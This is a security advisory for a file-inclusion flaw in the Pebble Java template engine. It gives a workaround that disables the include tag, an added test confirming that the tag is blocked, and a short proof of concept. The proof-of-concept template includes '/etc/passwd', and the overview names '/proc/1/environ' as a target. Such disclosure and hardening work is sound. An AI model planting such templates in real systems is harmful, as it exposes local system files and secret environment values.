External Control of File Name or Path Affecting io.pebbletemplates:pebble package, versions [0,]


Severity: medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept

  • Snyk ID: SNYK-JAVA-IOPEBBLETEMPLATES-8745594
  • Published: 25 Feb 2025
  • Disclosed: 24 Feb 2025
  • Credit: Jonathan Leitschuh

Introduced: 24 Feb 2025

CVE-2025-1686
CWE-73 (External Control of File Name or Path)

How to fix?

There is no fixed version for io.pebbletemplates:pebble.

Overview

io.pebbletemplates:pebble is a java templating engine inspired by Twig.

Affected versions of this package are vulnerable to External Control of File Name or Path via the include tag. A high-privileged attacker who can author templates (for example, notification templates) can read sensitive local files by using this tag to include files such as /etc/passwd or /proc/1/environ, since the path given to include is resolved by the engine's template loader without restriction.

Workaround

This vulnerability can be mitigated by disabling the include tag in Pebble Templates, so that any template containing it is rejected at parse time:

import java.util.List;

// Remove the "include" token parser from the engine: templates that use
// {% include %} now fail to parse instead of loading the named file.
PebbleEngine engine = new PebbleEngine.Builder()
            .registerExtensionCustomizer(new DisallowExtensionCustomizerBuilder()
                    .disallowedTokenParserTags(List.of("include"))
                    .build())
            .build();
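Since there is no fixed version, the workaround is the only control, and it is worth having a check that the engine actually in use refuses the include tag. The following Java class is an added example, not code from the advisory or from the Pebble project: it builds an engine exactly as in the workaround above, then confirms that a template using include is rejected while an ordinary template still renders. The package names for DisallowExtensionCustomizerBuilder and PebbleException are assumed to follow the Pebble 3.x layout under io.pebbletemplates.pebble, and 'header.peb' is a placeholder file name that is never read.

```java
import java.io.IOException;
import java.io.StringWriter;
import java.io.Writer;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

import io.pebbletemplates.pebble.PebbleEngine;
import io.pebbletemplates.pebble.error.PebbleException;              // assumed package
import io.pebbletemplates.pebble.extension.DisallowExtensionCustomizerBuilder; // assumed package
import io.pebbletemplates.pebble.template.PebbleTemplate;

/**
 * Added regression check (not part of Pebble): verifies that an engine built
 * with the advisory's workaround refuses templates that use the include tag,
 * while templates without it keep rendering.
 */
public class IncludeTagDisabledCheck {

    /** Engine configured as in the advisory's workaround. */
    static PebbleEngine hardenedEngine() {
        return new PebbleEngine.Builder()
                .registerExtensionCustomizer(new DisallowExtensionCustomizerBuilder()
                        .disallowedTokenParserTags(List.of("include"))
                        .build())
                .build();
    }

    /**
     * Returns true when the engine rejects the template source. With the
     * include token parser removed, the parser raises a PebbleException
     * (a ParserException) on the unknown tag before any file is resolved.
     */
    static boolean rejectsTemplate(PebbleEngine engine, String source) {
        Map<String, Object> context = new HashMap<>();
        context.put("name", "world");
        try (Writer out = new StringWriter()) {
            PebbleTemplate template = engine.getLiteralTemplate(source);
            template.evaluate(out, context);
            return false;            // rendered: the tag was not blocked
        } catch (PebbleException e) {
            return true;             // parser refused the disallowed tag
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        PebbleEngine engine = hardenedEngine();

        // Constructed sample inputs; 'header.peb' is a placeholder name.
        String usesInclude = "{% include 'header.peb' %}";
        String plain = "Hello {{ name }}!";

        boolean includeBlocked = rejectsTemplate(engine, usesInclude);
        boolean plainStillRenders = !rejectsTemplate(engine, plain);

        if (!includeBlocked) {
            throw new AssertionError("include tag is still enabled on this engine");
        }
        if (!plainStillRenders) {
            throw new AssertionError("hardened engine no longer renders plain templates");
        }
        System.out.println("include tag blocked; plain templates render normally");
    }
}
```

Run this against the same Builder configuration your application uses, not a freshly constructed one, so the check covers any extension or customizer that might re-enable the tag. Note that the workaround rejects every use of include, including legitimate ones in trusted templates, so the existing template set needs to be reviewed before the change ships.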

PoC

The following test demonstrates the vulnerability:

import java.io.StringWriter;
import java.io.Writer;
import java.util.HashMap;

// Default engine: the include tag is enabled and resolves paths via the default loader
PebbleEngine e = new PebbleEngine.Builder().build();

// A Java text block must start with a line break after the opening delimiter
String templateString = """
        {% include '/etc/passwd' %}
        """;
PebbleTemplate template = e.getLiteralTemplate(templateString);

try (final Writer writer = new StringWriter()) {
    template.evaluate(writer, new HashMap<>());
    System.out.println(writer);   // prints the contents of the included file
}

The malicious template used by the test, as an attacker would supply it:

{% include '/etc/passwd' %}
